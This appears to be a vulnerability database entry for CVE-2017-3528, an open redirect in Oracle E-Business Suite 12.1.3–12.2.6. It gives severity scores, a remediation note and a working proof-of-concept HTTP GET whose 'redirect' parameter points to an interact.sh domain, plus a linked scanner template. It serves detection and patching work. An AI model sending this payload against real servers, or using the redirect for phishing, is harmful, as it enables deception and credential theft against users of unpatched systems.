| Title | Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect |
|---|---|
| Author | 0x_Akoko |
| Severity | Medium |
| Impact | Attackers can redirect users to malicious sites for phishing attacks, malware distribution, or credential theft. |
| Remediation | Apply the necessary patches or updates provided by Oracle to fix the open redirect vulnerability. |
| CVSS Score | 5.4 |
| EPSS Score | 0.43239 |
| CVE ID | CVE-2017-3528 |
| CWE ID | CWE-601 |
| Tags | cve cve2017 oracle redirect edb vuln |
The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.
GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName&redirect=%2f%5cinteract.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-3528.yaml
🦈 Packet Capture: ⬇️ Download cve-2017-3528.pcap
N/AN/A